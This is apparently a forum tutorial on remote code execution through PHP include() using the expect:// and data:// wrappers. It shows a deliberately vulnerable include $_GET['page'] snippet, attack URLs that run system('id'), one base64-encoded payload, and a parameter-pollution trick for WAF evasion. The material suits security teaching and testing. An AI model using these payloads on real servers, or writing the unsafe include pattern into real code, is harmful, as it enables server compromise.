Remote Code Execution Through PHP Wrappers

Since I’ve not seen some of these methods covered around here (except for php://filter and php://input), I decided to put up some material on ‘em. Basically, they are more than self-explanatory but I still feel the need to tutorialize the process. First of all, in order to execute anything, you’d need to comply with the following conditions:

• $_GET parameter - Which we’ll be passing the payload to
• Version of PHP - 4.3+ for expect:// and 5.2+ for data://
• allow_url_include function enabled - In order to inject through the parameter

php://expect

The expect:// wrapper is not enabled by default as it’s an extension from the PECL package (consider it installed for now). The syntax it accepts is:

expect://[command]  

Consider this small snippet running on the backend:

<?php  

include $_GET['page'];  
//..  
?>  

Now we can pretty much run everything php-valid through it. so take the following URL for instance:

http://example.com/Keeper.php?page=expect://id  

php://data

The data:// wrapper bears the same concept. Syntax followed:

data://text/plain;base64,[command encoded in base64]  

or we can simply:

data://text/plain,[command]  

We’ll take under account that we’ll be using the above inclusion of the $_GET parameter so there be two possible scenarios:

http://example.com/Keeper.php?page=data://text/plain;base64,JTNDJTNGc3lzdGVtJTI4JTI3aWQlMjclMjklM0IlM0YlM0U=  

http://example.com/Keeper.php?page=data://text/plain,<?system('id');?>  

In case of a WAF, filtering out code that is after the wrapper as in the last examples, we can use parameter pollution to pass/split our payload into two parts, resulting in both parameters being concatenated and separated by a comma likewise:

http://example.com/Keeper.php?page=data://text/plain&page=<?system('id');?>  

For the HPP part, I have this covered here, won’t rephrase it again:
IDS & WAF Evasion with HTTP Parameter Pollution

Small and tidy.